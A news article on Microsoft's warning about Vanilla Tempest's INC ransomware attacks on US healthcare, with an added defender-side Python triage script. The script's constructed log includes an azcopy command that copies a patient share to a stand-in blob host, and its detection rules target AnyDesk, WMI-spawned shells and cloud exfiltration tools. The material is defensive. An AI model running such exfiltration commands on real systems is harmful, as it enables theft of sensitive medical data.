Microsoft Warns of Dangerous and Debilitating INC Ransomware Targeting Healthcare Systems


Microsoft has recently issued a warning about a new ransomware threat, dubbed INC, that is targeting the U.S. healthcare sector. This revelation comes from Microsoft’s threat intelligence team, which has been closely monitoring the activities of a financially motivated hacker group, known as Vanilla Tempest (formerly DEV-0832).

Vanilla Tempest and Its Tactics

Vanilla Tempest’s cyberattacks are sophisticated and involve a well-coordinated process. The group's tactics include receiving hand-offs from GootLoader infections orchestrated by the notorious threat actor Storm-0494. Following the GootLoader delivery, they use a variety of tools to gain control of target systems, including:

  • Supper: A malicious backdoor program
  • AnyDesk: A legitimate remote monitoring and management tool
  • MEGA: A cloud storage tool used for data synchronization

Once inside the environment, the attackers perform lateral movement using Remote Desktop Protocol (RDP) and Windows Management Instrumentation (WMI) Provider Host, before ultimately deploying the INC ransomware payload.

A Growing Threat Across Multiple Sectors

Vanilla Tempest has been active since at least July 2022, previously targeting industries like education, IT, and manufacturing. In the past, they have employed notorious ransomware strains like BlackCat, Quantum Locker, Zeppelin, and Rhysida. The healthcare sector, however, has become a prime target, given its critical nature and the large amounts of sensitive data it handles.

Notably, Vanilla Tempest is also known under the alias Vice Society, a group that favors leveraging pre-existing ransomware lockers instead of developing their own, a strategy that allows them to act quickly and effectively.

Evolving Techniques to Evade Detection

Ransomware gangs are continually evolving their tactics to avoid detection. In a related development, groups like BianLian and Rhysida have been observed using tools such as Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised systems. These tools, designed to manage Azure storage, are now being repurposed for large-scale data transfers to cloud storage, making it difficult for cybersecurity teams to detect and prevent these attacks.
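As an added example (not from the original article or from Microsoft), the following defender-side triage script looks for the tool chain described above, AnyDesk installation, shells spawned by the WMI Provider Host, and AzCopy or MEGA sync clients, in constructed process-creation events. The pipe-separated log format, the hosts, paths and the rule names are assumptions made for this example.

```python
"""Triage constructed process-creation events for the tooling named in the
article (AnyDesk, MEGA, AzCopy, WMI-driven lateral movement). Added example;
the log format, hosts, paths and rule names are assumptions."""
from collections import defaultdict

# Constructed sample events: "ts|host|parent_image|image|cmdline" per line.
SAMPLE_LOG = """\
2024-09-18T02:11:05|WS-07|C:\\Windows\\explorer.exe|C:\\Users\\bob\\Downloads\\AnyDesk.exe|AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent
2024-09-18T02:14:30|WS-07|C:\\Windows\\System32\\wbem\\WmiPrvSE.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c ipconfig /all
2024-09-18T02:20:12|FS-01|C:\\Windows\\System32\\cmd.exe|C:\\Tools\\azcopy.exe|azcopy.exe copy D:\\Shares\\Patients https://example.blob.core.windows.net/x --recursive
2024-09-18T02:22:44|FS-01|C:\\Windows\\explorer.exe|C:\\Users\\bob\\AppData\\Local\\MEGAsync\\MEGAsync.exe|MEGAsync.exe
2024-09-18T08:00:00|WS-03|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe
"""

# Each rule is (name, predicate over a parsed event). Image names are the
# tools' usual binary names; WmiPrvSE.exe is the WMI Provider Host.
RULES = [
    ("rmm_tool_install", lambda e: e["image"].lower().endswith("anydesk.exe")
        and "--install" in e["cmdline"].lower()),
    ("wmi_spawned_shell", lambda e: e["parent"].lower().endswith("wmiprvse.exe")
        and e["image"].lower().endswith(("cmd.exe", "powershell.exe"))),
    ("cloud_exfil_tool", lambda e: e["image"].lower().endswith(("azcopy.exe", "megasync.exe"))),
]

def parse_events(text):
    """Split the constructed log into event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split("|", 4)
        if len(parts) != 5:
            continue
        ts, host, parent, image, cmdline = parts
        events.append({"ts": ts, "host": host, "parent": parent,
                       "image": image, "cmdline": cmdline})
    return events

def triage(text):
    """Return {host: sorted list of matched rule names} for hosts with any hit,
    so a host showing several stages of the chain stands out at a glance."""
    hits = defaultdict(set)
    for e in parse_events(text):
        for name, pred in RULES:
            if pred(e):
                hits[e["host"]].add(name)
    return {host: sorted(rules) for host, rules in hits.items()}

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_LOG).items():
        print(f"{host}: {', '.join(rules)}")
```

Hosts where several rules fire in a short window (here WS-07 with an RMM install followed by a WMI-spawned shell) are the ones to escalate first, since each stage alone can also be legitimate administration.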

Protecting the Healthcare Sector

As ransomware groups continue to innovate their techniques, particularly targeting vital sectors like healthcare, organizations must remain vigilant and proactive in their cybersecurity measures. Microsoft’s timely warning emphasizes the growing need for healthcare organizations to employ robust security protocols, including up-to-date anti-malware software and secure network practices, to fend off these increasingly sophisticated threats.

By staying ahead of ransomware groups like Vanilla Tempest, the healthcare sector can better protect its valuable data and avoid becoming the next victim of this financial and data extortion scheme.

September 19, 2024